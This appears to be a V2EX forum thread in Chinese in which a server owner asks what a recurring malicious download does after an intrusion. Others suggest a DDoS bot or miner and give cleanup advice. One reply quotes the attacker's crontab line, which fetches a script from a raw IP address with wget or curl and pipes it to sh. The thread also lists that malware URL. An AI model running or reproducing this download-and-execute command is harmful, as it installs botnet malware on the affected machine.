一个双显卡服务器被入侵了，他会定时从下载脚本并执行

http://185.150.117.29/x/b

帮忙分析下这些脚本是干什么的？目前看显卡并没有运行，而是定时占用大量带宽。

rwecho

2021-07-06 13:07:56 +08:00

15 * * * * wget http://185.150.117.29/x/b -O- | sh || curl http://185.150.117.29/x/b | sh

它在电脑里面创建了一个用户名为：ps
然后里面有一个 crontab 命令

longbow0

2021-07-06 13:21:13 +08:00

主要是从 185.150.117.29 下载适配了不同硬件版本的木马 bot.*

其中，bot.x86 介绍在 https://s.tencent.com/research/report/1101.html

CaffreySun

2021-07-06 13:39:05 +08:00

这个脚步比较简单，就是“感染”你的服务器，并且创建定时任务重复“感染”。
至于他“感染”你的服务做什么，得看他执行的那些“bot”开头的程序了，找大佬反编译分析一下。
或许用来挖坑。
或许用来执行网络攻击。

Aresrun

2021-07-06 16:27:19 +08:00

我之前也被入侵了。服务器上没啥东西，就重装了系统

lopetver

2021-07-06 16:34:37 +08:00

@rwecho 认真的吗

这只是一个定时下载的任务而已啊，哪里有“它在电脑里面创建了一个用户名为：ps
然后里面有一个 crontab 命令” 这些操作

missz

2021-07-06 17:10:59 +08:00

把服务器做为肉鸡，用来 ddos，所以会时不时带宽拉满

no1xsyzy

2021-07-06 19:00:09 +08:00

命令行 HTTP 客户端竟然是 wget 和 curl 而没有 lynx
我记得哪个 Unix 环境是默认只有 lynx 的来着？

yogogo

2021-07-07 08:09:40 +08:00

前几天我一台也是给挂挖矿的，后来就关端口，开 selinux，就好了

rwecho

2021-07-07 09:32:39 +08:00

已经把下载的脚本清空了，目前没看到有异常情况，之前 root 密码太弱了

lanshee

2021-07-07 09:58:50 +08:00

@rwecho #23 清空是治标不治本的.

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.